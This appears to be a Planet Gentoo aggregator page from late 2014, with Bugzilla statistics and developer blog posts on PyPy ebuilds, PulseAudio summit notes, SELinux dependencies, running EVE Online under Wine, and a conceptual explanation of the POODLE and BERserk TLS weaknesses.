kde-frameworks/ktexteditor kensington 15 Oct 2014
kde-frameworks/kdoctools kensington 15 Oct 2014
kde-frameworks/krunner kensington 15 Oct 2014
kde-frameworks/kitemviews kensington 15 Oct 2014
kde-frameworks/karchive kensington 15 Oct 2014
kde-frameworks/khtml kensington 15 Oct 2014
kde-frameworks/kwindowsystem kensington 15 Oct 2014
kde-frameworks/kparts kensington 15 Oct 2014
kde-frameworks/ktextwidgets kensington 15 Oct 2014
kde-frameworks/threadweaver kensington 15 Oct 2014
kde-base/oxygen-fonts kensington 15 Oct 2014
dev-libs/sni-qt mrueg 15 Oct 2014
dev-db/etcdctl zmedico 15 Oct 2014
dev-db/go-etcd zmedico 16 Oct 2014
sys-fs/etcd-fs zmedico 16 Oct 2014
dev-python/mamba alunduil 16 Oct 2014
virtual/podofo-build zmedico 16 Oct 2014
dev-games/goatee hasufell 16 Oct 2014
games-board/goatee-gtk hasufell 16 Oct 2014
app-crypt/etcd-ca zmedico 16 Oct 2014
dev-python/expects alunduil 17 Oct 2014
app-emacs/rust-mode jauhien 18 Oct 2014
app-vim/rust-mode jauhien 18 Oct 2014
app-shells/rust-zshcomp jauhien 18 Oct 2014
dev-lang/rust-bin jauhien 18 Oct 2014
dev-python/args alunduil 18 Oct 2014
sys-process/xjobs mjo 19 Oct 2014
dev-python/parse-type alunduil 19 Oct 2014
dev-perl/Devel-CheckCompiler dilfridge 19 Oct 2014
dev-perl/Cwd-Guard dilfridge 19 Oct 2014
dev-perl/Module-Build-XSUtil dilfridge 19 Oct 2014
dev-perl/File-Find-Rule-Perl dilfridge 19 Oct 2014
dev-perl/PPI-PowerToys dilfridge 19 Oct 2014
dev-util/jenkins-bin mrueg 20 Oct 2014
dev-python/sphinxcontrib-cheeseshop alunduil 21 Oct 2014
dev-perl/BZ-Client dilfridge 21 Oct 2014
dev-perl/Data-Serializer dilfridge 21 Oct 2014
dev-perl/Math-NumberCruncher dilfridge 21 Oct 2014
dev-python/behave alunduil 22 Oct 2014
dev-python/django-opensearch ercpe 22 Oct 2014
app-admin/lastpass-cli zx2c4 22 Oct 2014
dev-python/simpleeval cedk 22 Oct 2014
net-misc/xrdp mgorny 23 Oct 2014
dev-libs/collada-dom aballier 23 Oct 2014
sci-libs/libccd aballier 23 Oct 2014
dev-ml/ocaml-re aballier 24 Oct 2014
dev-ml/cudf aballier 24 Oct 2014
dev-perl/File-ShareDir-Install dilfridge 24 Oct 2014
dev-perl/POSIX-strftime-Compiler dilfridge 24 Oct 2014
dev-perl/Apache-LogFormat-Compiler dilfridge 24 Oct 2014
dev-python/doublex-expects alunduil 25 Oct 2014
app-crypt/libu2f-host flameeyes 25 Oct 2014
app-crypt/libykneomgr flameeyes 25 Oct 2014
app-crypt/yubikey-neo-manager flameeyes 25 Oct 2014
dev-perl/Redis dilfridge 25 Oct 2014
dev-perl/Types-Serialiser dilfridge 25 Oct 2014
net-analyzer/ospd jlec 26 Oct 2014
dev-perl/Cache-FastMmap dilfridge 26 Oct 2014
dev-python/dockerpty alunduil 27 Oct 2014
app-text/restview radhermit 27 Oct 2014
dev-ml/parmap aballier 27 Oct 2014
dev-ml/camlbz2 aballier 27 Oct 2014
net-misc/x11rdp mgorny 27 Oct 2014
app-emulation/fig alunduil 27 Oct 2014
dev-perl/Algorithm-ClusterPoints dilfridge 27 Oct 2014
dev-ml/dose3 aballier 28 Oct 2014
x11-libs/libQGLViewer aballier 28 Oct 2014
dev-ml/cmdliner aballier 29 Oct 2014
dev-ml/uutf aballier 29 Oct 2014
dev-ml/jsonm aballier 29 Oct 2014
dev-ml/opam aballier 29 Oct 2014
sci-libs/octomap aballier 29 Oct 2014
app-text/regex idella4 29 Oct 2014
dev-python/regex idella4 29 Oct 2014
games-rpg/soltys calchan 30 Oct 2014
sci-libs/orocos_kdl aballier 30 Oct 2014
dev-cpp/metslib aballier 31 Oct 2014
media-libs/libsixel hattya 31 Oct 2014
app-crypt/libscrypt blueness 31 Oct 2014
sec-policy/selinux-android swift 31 Oct 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 October 2014 and 01 November 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2014-11

Bug Activity Number
New 1881
Closed 1153
Not fixed 171
Duplicates 168
Total 6198
Blocker 4
Critical 18
Major 65

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Linux Gnome Desktop Team 50
2 Gentoo Perl team 43
3 Gentoo Games 42
4 Gentoo KDE team 39
5 Gentoo's Team for Core System packages 39
6 Netmon Herd 32
7 Python Gentoo Team 27
8 PHP Bugs 25
9 Gentoo Toolchain Maintainers 21
10 Others 834

gmn-closed-2014-11

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 107
2 Gentoo Linux Gnome Desktop Team 69
3 Gentoo's Team for Core System packages 65
4 Gentoo Security 58
5 Gentoo KDE team 53
6 Python Gentoo Team 49
7 Gentoo Games 47
8 Gentoo Perl team 44
9 Default Assignee for New Packages 43
10 Others 1345

gmn-opened-2014-11

 

Heard in the community

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

November 12, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Veteran’s Day is one of uncertainty (November 12, 2014, 03:17 UTC)

Today, 11 November, is an interesting holiday in the United States. It is the day in which we honour those individuals who have served in the armed forces and have defended their country. I say that it is an interesting holiday because I am torn on how I feel about the entire concept. On one hand, I am incredibly grateful for those people that have fought to defend the principles and freedoms on which the United States was founded. However, the fight itself is one that I cannot condone.

There is no flag large enough to cover the shame of killing innocent people
There is no flag large enough to cover the shame of killing innocent people

Threats to freedom in any nation are brought about by political groups, and should be handled in a political manner. I understand that my viewpoint here is one of pseudoutopian cosmography, but it is one that I hope will become more and more realistic as both time and humanity march onward. The “wars” should be fought by national leaders, and done so via discussion and debate; not by citizens (military or civilian) via guns, bombs, or other weaponry.

I also understand that there will be many people who disagree (in degrees that result in emotions ranging from mild irritation to infuriated hostility) with my viewpoint, and that is completely fine. Again, my dilemma comes from being simultaneously thankful for those individuals who have given their all to defend “freedom” (whatever concept that word may represent) and sorrowful that they were the ones that had to give anything at all. These men and women had to leave their families knowing that they may never return to them; knowing that they may die trying to defend something that shouldn’t be challenged in the first place—human freedoms.

Little boy looking at his veteran father
Who will explain it to him?

Let us not forget a quote by former President of the United States, John F. Kennedy who stated that “mankind must put an end to war before war puts an end to mankind.”

–Zach

November 10, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Today's good news is that our manuscript "Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube" has been accepted for publication by New Journal of Physics.
In a way, this work is directly building on our previous publication on thermally induced quasiparticles in niobium-carbon nanotube hybrid systes. As a contribution mainly from our theory colleagues, now the modelling of transport processes is enhanced and extended to cotunneling processes within Coulomb blockade. A generalized master equation based on the reduced density matrix approach in the charge conserved regime is derived, applicable to any strength of the intradot interaction and to finite values of the superconducting gap.
We show both theoretically and experimentally that also in cotunneling spectroscopy distinct thermal "replica lines" due to the finite quasiparticle occupation of the superconductor occur at higher temperature T~1K: the now possible transport processes lead to additional conductance both at zero bias and at finite voltage corresponding to an excitation energy; experiment and theoretical result match very well.

"Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube"
S. Ratz, A. Donarini, D. Steininger, T. Geiger, A. Kumar, A. K. Hüttel, Ch. Strunk, and M. Grifoni
accepted for publication by New Journal of Physics, arXiv:1408.5000 (PDF)

November 09, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
PyPy is back, and for real this time! (November 09, 2014, 23:17 UTC)

As you may recall, I was looking for a dedicated PyPy maintainer for quite some time. Sadly, all the people who helped (and who I’d like to thank a lot) ended up lacking time soon enough. So finally I’ve decided to look into the hacks reducing build-time memory use and take care of the necessary ebuild and packaging work myself.

So first of all, you may notice that the new PyPy (source-code) ebuilds have a new USE flag called low-memory. When this flag is enabled, the translation process is done using PyPy with some memory-reducing adjustments suggested by upstream. The net result is that it finally is possible to build PyPy with 3.5G RAM (on amd64) and 1G of swap (the latter being used the compiler is spawned and memory used during translation is no longer necessary), at a cost of slightly increased build time.

As noted above, the low-memory option requires using PyPy to perform the translation. So while having to enforce that, I went a bit further and made the ebuild default to using PyPy whenever available. In fact, even for a first PyPy build you are recommended to install dev-python/pypy-bin first and let the ebuild use it to bootstrap your own PyPy.

Next, I have cleaned up the ebuilds a bit and enforced more consistency. Changing maintainers and binary package builders have resulted in the ebuilds being a bit inconsistent. Now you can finally expect pypy-bin to install exactly the same set of files as source-built pypy.

I have also cleaned up the remaining libpypy-c symlinks. The library is not packaged upstream currently, and therefore has no proper public name. Using libpypy-c.so is just wrong, and packages can’t reliably refer to that. I’d rather wait with installing it till there’s some precedence in renaming. The shared library is still built but it’s kept inside the PyPy home directory.

All those changes were followed by a proper version bump to 2.4.0. While you still may have issues upgrading PyPy, Zac already committed a patch to Portage and the next release should be able to handle PyPy upgrades seamlessly. I have also built all the supported binary package variants, so you can choose those if you don’t want to spend time building PyPy.

Finally, I have added the ebuilds for PyPy 3. They are a little bit more complex than regular PyPy, especially because the build process and some of the internal modules still require Python 2. Sadly, PyPy 3 is based on Python 3.2 with small backports, so I don’t expect package compatibility much greater than CPython 3.2 had.

If you want to try building some packages with PyPy 3, you can use the convenience PYTHON_COMPAT_OVERRIDE hack:

PYTHON_COMPAT_OVERRIDE='pypy3' emerge -1v mypackage

Please note that it is only a hack, and as such it doesn’t set proper USE flags (PYTHON_TARGETS are simply ignored) or enforce dependencies.

If someone wants to help PyPy on Gentoo a bit, there are still unsolved issues needing a lot of specialist work. More specifically:

  1. #465546; PyPy needs to be modified to support /usr prefix properly (right now, it requires prefix being /usr/lib*/pypy which breaks distutils packages assuming otherwise.
  2. #525940; non-SSE2 JIT does not build.
  3. #429372; we lack proper sandbox install support.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
gentooJoin 2004/04/11 (November 09, 2014, 11:06 UTC)

How time flies!
gentooJoin: 2004/04/11

Now I feel ooold

November 05, 2014
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Just a simple webapp, they said ... (November 05, 2014, 08:38 UTC)

The complexity of modern software is quite insanely insane. I just realized ...
Writing a small webapp with flask, I've had to deal with the following technologies/languages:

  • System package manager, in this case portage
  • SQL DBs, both SQLite (local testing) and PostgreSQL (production)
  • python/flask, the core of this webapp
  • jinja2, the template language usually used with it
  • HTML, because the templates don't just appear magically
  • CSS (mostly hidden in Bootstrap) to make it look sane
  • JavaScript, because dynamic shizzle
  • (flask-)sqlalchemy, ORMs are easier than writing SQL by hand when you're in a hurry
  • alembic, for DB migrations and updates
  • git, because version control
So that's about a dozen things that each would take years to master. And for a 'small' project there's not much time to learn them deeply, so we staple together what we can, learning as we go along ...

And there's an insane amount of context switching going on, you go from mangling CSS to rewriting SQL in the span of a few minutes. It's an impressive polyglot marathon, but how is this supposed to generate sustainable and high-quality results?

Und then I go home in the evening and play around with OpenCL and such things. Learning never ends - but how are we going to build things that last for more than 6 months? Too many moving parts, too much change, and never enough time to really understand what we're doing :)

November 04, 2014
Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
Notes from the PulseAudio Mini Summit 2014 (November 04, 2014, 16:49 UTC)

The third week of October was quite action-packed, with a whole bunch of conferences happening in Düsseldorf. The Linux audio developer community as well as the PulseAudio developers each had a whole day of discussions related to a wide range of topics. I’ll be summarising the events of the PulseAudio mini summit day here. The discussion was split into two parts, the first half of the day with just the current core developers and the latter half with members of the community participating as well.

I’d like to thank the Linux Foundation for sparing us a room to carry out these discussions — it’s fantastic that we are able to colocate such meetings with a bunch of other conferences, making it much easier than it would otherwise be for all of us to converge to a single place, hash out ideas, and generally have a good time in real life as well!

Incontrovertible proof that all our users are happy

Happy faces — incontrovertible proof that everyone loves PulseAudio!

With a whole day of discussions, this is clearly going to be a long post, so you might want to grab a coffee now. :)

Release plan

We have a few blockers for 6.0, and some pending patches to merge (mainly HSP support). Once this is done, we can proceed to our standard freeze → release candidate → stable process.

Build simplification for BlueZ HFP/HSP backends

For simplifying packaging, it would be nice to be able to build all the available BlueZ module backends in one shot. There wasn’t much opposition to this idea, and David (Henningsson) said he might look at this. (as I update this before posting, he already has)

srbchannel plans

We briefly discussed plans around the recently introduced shared ringbuffer channel code for communication between PulseAudio clients and the server. We talked about the performance benefits, and future plans such as direct communication between the client and server-side I/O threads.

Routing framework patches

Tanu (Kaskinen) has a long-standing set of patches to add a generic routing framework to PulseAudio, developed by notably Jaska Uimonen, Janos Kovacs, and other members of the Tizen IVI team. This work adds a set of new concepts that we’ve not been entirely comfortable merging into the core. To unblock these patches, it was agreed that doing this work in a module and using a protocol extension API would be more beneficial. (Tanu later did a demo of the CLI extensions that have been made for the new routing concepts)

module-device-manager

As a consequence of the discussion around the routing framework, David mentioned that he’d like to take forward Colin’s priority list work in the mean time. Based on our discussions, it looked like it would be possible to extend module-device-manager to make it port aware and get the kind functionality we want (the ability to have a priority-order list of devices). David was to look into this.

Module writing infrastructure

Relatedly, we discussed the need to export the PA internal headers to allow externally built modules. We agreed that this would be okay to have if it was made abundantly clear that this API would have absolutely no stability guarantees, and is mostly meant to simplify packaging for specialised distributions.

Which led us to the other bit of infrastructure required to write modules more easily — making our protocol extension mechanism more generic. Currently, we have a static list of protocol extensions in our core. Changing this requires exposing our pa_tagstruct structure as public API, which we haven’t done. If we don’t want to do that, then we would expose a generic “throw this blob across the protocol” mechanism and leave it to the module/library to take care of marshalling/unmarshalling.

Resampler quality evaluation

Alexander shared a number of his findings about resampler quality on PulseAudio, vs. those found on Windows and Mac OS. Some questions were asked about other parameters, such as relative CPU consumption, etc. There was also some discussion on how to try to carry this work to a conclusion, but no clear answer emerged.

It was also agreed on the basis of this work that support for libsamplerate and ffmpeg could be phased out after deprecation.

Addition of a “hi-fi” mode

The discussion came around to the possibility of having a mode where (if the hardware supports it), PulseAudio just plays out samples without resampling, conversion, etc. This has been brought up in the past for “audiophile” use cases where the card supports 88.2/96 kHZ and higher sample rates.

No objections were raised to having such a mode — I’d like to take this up at some point of time.

LFE channel module

Alexander has some code for filtering low frequencies for the LFE channel, currently as a virtual sink, that could eventually be integrated into the core.

rtkit

David raised a question about the current status of rtkit and whether it needs to exist, and if so, where. Lennart brought up the fact that rtkit currently does not work on systemd+cgroups based setups (I don’t seem to have why in my notes, and I don’t recall off the top of my head).

The conclusion of the discussion was that some alternate policy method for deciding RT privileges, possibly within systemd, would be needed, but for now rtkit should be used (and fixed!)

kdbus/memfd

Discussions came up about the possibility of using kdbus and/or memfd for the PulseAudio transport. This is interesting to me, there doesn’t seem to be an immediately clear benefit over our SHM mechanism in terms of performance, and some work to evaluate how this could be used, and what the benefit would be, needs to be done.

ALSA controls spanning multiple outputs

David has now submitted patches for controls that affect multiple outputs (such as “Headphone+LO”). These are currently being discussed.

Audio groups

Tanu would like to add code to support collecting audio streams into “audio groups” to apply collective policy to them. I am supposed to help review this, and Colin mentioned that module-stream-restore already uses similar concepts.

Stream and device objects

Tanu proposed the addition of new objects to represent streams and objects. There didn’t seem to be consensus on adding these, but there was agreement of a clear need to consolidate common code from sink-input/source-output and sink/source implementations. The idea was that having a common parent object for each pair might be one way to do this. I volunteered to help with this if someone’s taking it up.

Filter sinks

Alexander brough up the need for a filter API in PulseAudio, and this is something I really would like to have. I am supposed to sketch out an API (though implementing this is non-trivial and will likely take time).

Dynamic PCM for HDMI

David plans to see if we can use profile availability to help determine when an HDMI device is actually available.

Browser volumes

The usability of flat-volumes for browser use cases (where the volume of streams can be controlled programmatically) was discussed, and my patch to allow optional opt-out by a stream from participating in flat volumes came up. Tanu and I are to continue the discussion already on the mailing list to come up with a solution for this.

Handling bad rewinding code

Alexander raised concerns about the quality of rewinding code in some of our filter modules. The agreement was that we needed better documentation on handling rewinds, including how to explicitly not allow rewinds in a sink. The example virtual sink/source code also needs to be adjusted accordingly.

BlueZ native backend

Wim Taymans’ work on adding back HSP support to PulseAudio came up. Since the meeting, I’ve reviewed and merged this code with the change we want. Speaking to Luiz Augusto von Dentz from the BlueZ side, something we should also be able to add back is for PulseAudio to act as an HSP headset (using the same approach as for HSP gateway support).

Containers and PA

Takashi Iwai raised a question about what a good way to run PA in a container was. The suggestion was that a tunnel sink would likely be the best approach.

Common ALSA configuration

Based on discussion from the previous day at the Linux Audio mini-summit, I’m supposed to look at the possibility of consolidating the various mixer configuration formats we currently have to deal with (primarily UCM and its implementations, and Android’s XML format).

(thanks to Tanu, David and Peter for reviewing this)

November 03, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)

Poodle
The latest SSL attack was called POODLE. Image source
The world of SSL/TLS Internet encryption is in trouble again. You may have heard that recently a new vulnerability called POODLE has been found in the ancient SSLv3 protocol. Shortly before another vulnerability that's called BERserk has been found (which hasn't received the attention it deserved because it was published on the same day as Shellshock).
.
I think it is crucial to understand what led to these vulnerabilities. I find POODLE and BERserk so interesting because these two vulnerabilities were both unnecessary and could've been avoided by intelligent design choices. Okay, let's start by investigating what went wrong.

The mess with CBC

POODLE (Padding Oracle On Downgraded Legacy Encryption) is a weakness in the CBC block mode and the padding of the old SSL protocol. If you've followed previous stories about SSL/TLS vulnerabilities this shouldn't be news. There have been a whole number of CBC-related vulnerabilities, most notably the Padding oracle (2003), the BEAST attack (2011) and the Lucky Thirteen attack (2013) (Lucky Thirteen is kind of my favorite, because it was already more or less mentioned in the TLS 1.2 standard). The POODLE attack builds on ideas already used in previous attacks.

CBC is a so-called block mode. For now it should be enough to understand that we have two kinds of ciphers we use to authenticate and encrypt connections – block ciphers and stream ciphers. Block ciphers need a block mode to operate. There's nothing necessarily wrong with CBC, it's the way CBC is used in SSL/TLS that causes problems. There are two weaknesses in it: Early versions (before TLS 1.1) use a so-called implicit Initialization Vector (IV) and they use a method called MAC-then-Encrypt (used up until the very latest TLS 1.2, but there's a new extension to fix it) which turned out to be quite fragile when it comes to security. The CBC details would be a topic on their own and I won't go into the details now. The long-term goal should be to get rid of all these (old-style) CBC modes, however that won't be possible for quite some time due to compatibility reasons. As most of these problems have been known since 2003 it's about time.

The evil Protocol Dance

The interesting question with POODLE is: Why does a security issue in an ancient protocol like SSLv3 bother us at all? SSL was developed by Netscape in the mid 90s, it has two public versions: SSLv2 and SSLv3. In 1999 (15 years ago) the old SSL was deprecated and replaced with https://tools.ietf.org/html/rfc2246 TLS 1.0 standardized by the IETF. Now people still used SSLv3 up until very recently mostly for compatibility reasons. But even that in itself isn't the problem. SSL/TLS has a mechanism to safely choose the best protocol available. In a nutshell it works like this:

a) A client (e. g. a browser) connects to a server and may say something like "I want to connect with TLS 1.2“
b) The server may answer "No, sorry, I don't understand TLS 1.2, can you please connect with TLS 1.0?“
c) The client says "Ok, let's connect with TLS 1.0“

The point here is: Even if both server and client support the ancient SSLv3, they'd usually not use it. But this is the idealized world of standards. Now welcome to the real world, where things like this happen:

a) A client (e. g. a browser) connects to a server and may say something like "I want to connect with TLS 1.2“
b) The server thinks "Oh, TLS 1.2, never heard of that. What should I do? I better say nothing at all...“
c) The browser thinks "Ok, server doesn't answer, maybe we should try something else. Hey, server, I want to connect with TLS 1.1“
d) The browser will retry all SSL versions down to SSLv3 till it can connect.

Dance with the Devil
The Protocol Dance is a Dance with the Devil. Image source
So here's our problem: There are broken servers out there that don't answer at all if they see a connection attempt with an unknown protocol. The well known SSL test by Qualys checks for this behaviour and calls it „Protocol intolerance“ (but „Protocol brokenness“ would be more precise). On connection fails the browsers will try all old protocols they know until they can connect. This behaviour is now known as the „Protocol Dance“ - and it causes all kinds of problems.

I first encountered the Protocol Dance back in 2008. Back then I already used a technology called SNI (Server Name Indication) that allows to have multiple websites with multiple certificates on a single IP address. I regularly became complains from people who saw the wrong certificates on those SNI webpages. A bug report to Firefox and some analysis revealed the reason: The protocol downgrades don't just happen when servers don't answer to new protocol requests, they also can happen on faulty or weak internet connections. SSLv3 does not support SNI, so when a downgrade to SSLv3 happens you get the wrong certificate. This was quite frustrating: A compatibility feature that was purely there to support broken hardware caused my completely legit setup to fail every now and then.

But the more severe problem is this: The Protocol Dance will allow an attacker to force downgrades to older (less secure) protocols. He just has to stop connection attempts with the more secure protocols. And this is why the POODLE attack was an issue after all: The problem was not backwards compatibility. The problem was attacker-controlled backwards compatibility.

The idea that the Protocol Dance might be a security issue wasn't completely new either. At the Black Hat conference this year Antoine Delignat-Lavaud presented a variant of an attack he calls "Virtual Host Confusion“ where he relied on downgrading connections to force SSLv3 connections.

"Whoever breaks it first“ - principle

The Protocol Dance is an example for something that I feel is an unwritten rule of browser development today: Browser vendors don't want things to break – even if the breakage is the fault of someone else. So they add all kinds of compatibility technologies that are purely there to support broken hardware. The idea is: When someone introduced broken hardware at some point – and it worked because the brokenness wasn't triggered at that point – the broken stuff is allowed to stay and all others have to deal with it.

To avoid the Protocol Dance a new feature is now on its way: It's called SCSV and the idea is that the Protocol Dance is stopped if both the server and the client support this new protocol feature. I'm extremely uncomfortable with that solution because it just adds another layer of duct tape and increases the complexity of TLS which already is much too complex.

There's another recent example which is very similar: At some point people found out that BIG-IP load balancers by the company F5 had trouble with TLS connection attempts larger than 255 bytes. However it was later revealed that connection attempts bigger than 512 bytes also succeed. So a padding extension was invented and it's now widespread behaviour of TLS implementations to avoid connection attempts between 256 and 511 bytes. To make matters completely insane: It was later found out that there is other broken hardware – SMTP servers by Ironport – that breaks when the handshake is larger than 511 bytes.

I have a principle when it comes to fixing things: Fix it where its broken. But the browser world works differently. It works with the „whoever breaks it first defines the new standard of brokenness“-principle. This is partly due to an unhealthy competition between browsers. Unfortunately they often don't compete very well on the security level. What you'll constantly hear is that browsers can't break any webpages because that will lead to people moving to other browsers.

I'm not sure if I entirely buy this kind of reasoning. For a couple of months the support for the ftp protocol in Chrome / Chromium is broken. I'm no fan of plain, unencrypted ftp and its only legit use case – unauthenticated file download – can just as easily be fulfilled with unencrypted http, but there are a number of live ftp servers that implement a legit and working protocol. I like Chromium and it's my everyday browser, but for a while the broken ftp support was the most prevalent reason I tend to start Firefox. This little episode makes it hard for me to believe that they can't break connections to some (broken) ancient SSL servers. (I just noted that the very latest version of Chromium has fixed ftp support again.)

BERserk, small exponents and PKCS #1 1.5

Keys
We have a problem with weak keys. Image source
Okay, now let's talk about the other recent TLS vulnerability: BERserk. Independently Antoine Delignat-Lavaud and researchers at Intel found this vulnerability which affected NSS (and thus Chrome and Firefox), CyaSSL, some unreleased development code of OpenSSL and maybe others.

BERserk is actually a variant of a quite old vulnerability (you may begin to see a pattern here): The Bleichenbacher attack on RSA first presented at Crypto 2006. Now here things get confusing, because the cryptographer Daniel Bleichenbacher found two independent vulnerabilities in RSA. One in the RSA encryption in 1998 and one in RSA signatures in 2006, for convenience I'll call them BB98 (encryption) and BB06 (signatures). Both of these vulnerabilities expose faulty implementations of the old RSA standard PKCS #1 1.5. And both are what I like to call "zombie vulnerabilities“. They keep coming back, no matter how often you try to fix them. In April the BB98 vulnerability was re-discovered in the code of Java and it was silently fixed in OpenSSL some time last year.

But BERserk is about the other one: BB06. BERserk exposes the fact that inside the RSA function an algorithm identifier for the used hash function is embedded and its encoded with BER. BER is part of ASN.1. I could tell horror stories about ASN.1, but I'll spare you that for now, maybe this is a topic for another blog entry. It's enough to know that it's a complicated format and this is what bites us here: With some trickery in the BER encoding one can add further data into the RSA function – and this allows in certain situations to create forged signatures.

One thing should be made clear: Both the original BB06 attack and BERserk are flaws in the implementation of PKCS #1 1.5. If you do everything correct then you're fine. These attacks exploit the relatively simple structure of the old PKCS standard and they only work when RSA is done with a very small exponent. RSA public keys consist of two large numbers. The modulus N (which is a product of two large primes) and the exponent.

In his presentation at Crypto 2006 Daniel Bleichenbacher already proposed what would have prevented this attack: Just don't use RSA keys with very small exponents like three. This advice also went into various recommendations (e. g. by NIST) and today almost everyone uses 65537 (the reason for this number is that due to its binary structure calculations with it are reasonably fast).

There's just one problem: A small number of keys are still there that use the exponent e=3. And six of them are used by root certificates installed in every browser. These root certificates are the trust anchor of TLS (which in itself is a problem, but that's another story). Here's our problem: As long as there is one single root certificate with e=3 with such an attack you can create as many fake certificates as you want. If we had deprecated e=3 keys BERserk would've been mostly a non-issue.

There is one more aspect of this story: What's this PKCS #1 1.5 thing anyway? It's an old standard for RSA encryption and signatures. I want to quote Adam Langley on the PKCS standards here: "In a modern light, they are all completely terrible. If you wanted something that was plausible enough to be widely implemented but complex enough to ensure that cryptography would forever be hamstrung by implementation bugs, you would be hard pressed to do better."

Now there's a successor to the PKCS #1 1.5 standard: PKCS #1 2.1, which is based on technologies called PSS (Probabilistic Signature Scheme) and OAEP (Optimal Asymmetric Encryption Padding). It's from 2002 and in many aspects it's much better. I am kind of a fan here, because I wrote my thesis about this. There's just one problem: Although already standardized 2002 people still prefer to use the much weaker old PKCS #1 1.5. TLS doesn't have any way to use the newer PKCS #1 2.1 and even the current drafts for TLS 1.3 stick to the older - and weaker - variant.

What to do

I would take bets that POODLE wasn't the last TLS/CBC-issue we saw and that BERserk wasn't the last variant of the BB06-attack. Basically, I think there are a number of things TLS implementers could do to prevent further similar attacks:

* The Protocol Dance should die. Don't put another layer of duct tape around it (SCSV), just get rid of it. It will break a small number of already broken devices, but that is a reasonable price for avoiding the next protocol downgrade attack scenario. Backwards compatibility shouldn't compromise security.
* More generally, I think the working around for broken devices has to stop. Replace the „whoever broke it first“ paradigm with a „fix it where its broken“ paradigm. That also means I think the padding extension should be scraped.
* Keys with weak choices need to be deprecated at some point. In a long process browsers removed most certificates with short 1024 bit keys. They're working hard on deprecating signatures with the weak SHA1 algorithm. I think e=3 RSA keys should be next on the list for deprecation.
* At some point we should deprecate the weak CBC modes. This is probably the trickiest part, because up until very recently TLS 1.0 was all that most major browsers supported. The only way to avoid them is either using the GCM mode of TLS 1.2 (most browsers just got support for that in recent months) or using a very https://tools.ietf.org/html/rfc7366 new extension that's rarely used at all today.
* If we have better technologies we should start using them. PKCS #1 2.1 is clearly superior to PKCS #1 1.5, at least if new standards get written people should switch to it.

November 02, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)

I just finished updating 102 packages. The change? Removing the following from the ebuilds:

DEPEND="selinux? ( sec-policy/selinux-${packagename} )"

In the past, we needed this construction in both DEPEND and RDEPEND. Recently however, the SELinux eclass got updated with some logic to relabel files after the policy package is deployed. As a result, the DEPEND variable no longer needs to refer to the SELinux policy package.

This change also means that for those moving from a regular Gentoo installation to an SELinux installation will have much less packages to rebuild. In the past, getting USE="selinux" (through the SELinux profiles) would rebuild all packages that have a DEPEND dependency to the SELinux policy package. No more – only packages that depend on the SELinux libraries (like libselinux) or utilities rebuild. The rest will just pull in the proper policy package.

October 31, 2014
Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
EVE Online on Gentoo Linux (October 31, 2014, 16:56 UTC)

Good news, everyone! I’m finally rid of Windows.

A couple weeks ago my Windows installation corrupted itself on the 5 minute trip home from the community theatre. I didn’t command it to go to sleep, I just unplugged it and closed the lid. Somehow, it managed to screw up its startup files, and the restore process didn’t do what it was supposed to so I was greeted with a blank screen. No errors. Just staring into the void.

I’ve been using Windows as the sole OS on this machine with Gentoo running in VirtualBox for various reasons related to minor annoyances of unsupported hardware, but as I needed a working machine sooner rather than later and the only tools I could find to solve my Windows problem appeared to be old, defunct, and/or suspicious, I downloaded an ISO of SystemRescueCd (www.sysresccd.org) and installed Gentoo in the sliver of space left on the drive.

There were only two real reasons why I was intent on keeping Windows: Netflix (netflix.com) and EVE Online (eveonline.com). I intended to get Windows up and running once the show was over at the theatre, but then I read about Netflix being supported in Linux (www.mpagano.com). That left me with just one reason to keep Windows: EVE. I turned to Wine (www.winehq.org) and discovered reports of it running EVE quite well (appdb.winehq.org). I also learned that the official Mac OS release of EVE runs on Cider (www.transgaming.com), which is based on Wine.

I had another hitch: I chose the no-multilib stage3 for that original sliver thinking I wouldn’t be running anything other than 64 bit software, and drive space was at a premium. EVE Online is 32 bit.

So I had to begin my adventure with switching to multilib. This didn’t involve me reinstalling Gentoo thanks to a handy, but unsupported and unofficial, guide (jkroon.blogs.uls.co.za) by Jaco Kroon.

As explained on Multilib System without emul-linux Packages (wiki.gentoo.org), I decided it’s better to build my own 32 bit library. So, the next step is to mask the emulation packages:

# /etc/portage/package.mask
app-emulation/emul-linux-x86-*

Because I didn’t want to build a 32 bit variant for everything on my system, I iterated through what Portage wanted and marked several packages to build their 32 bit variant via use flags. This is what I wound up with:

# /etc/portage/package.use
app-arch/bzip2 abi_x86_32
app-emulation/wine mono abi_x86_32
dev-libs/elfutils static-libs abi_x86_32
dev-libs/expat abi_x86_32
dev-libs/glib abi_x86_32
dev-libs/gmp abi_x86_32
dev-libs/icu abi_x86_32
dev-libs/libffi abi_x86_32
dev-libs/libgcrypt abi_x86_32
dev-libs/libgpg-error abi_x86_32
dev-libs/libpthread-stubs abi_x86_32
dev-libs/libtasn1 abi_x86_32
dev-libs/libxml2 abi_x86_32
dev-libs/libxslt abi_x86_32
dev-libs/nettle abi_x86_32
dev-util/pkgconfig abi_x86_32
media-libs/alsa-lib abi_x86_32
media-libs/fontconfig abi_x86_32
media-libs/freetype abi_x86_32
media-libs/glu abi_x86_32
media-libs/libjpeg-turbo abi_x86_32
media-libs/libpng abi_x86_32
media-libs/libtxc_dxtn abi_x86_32
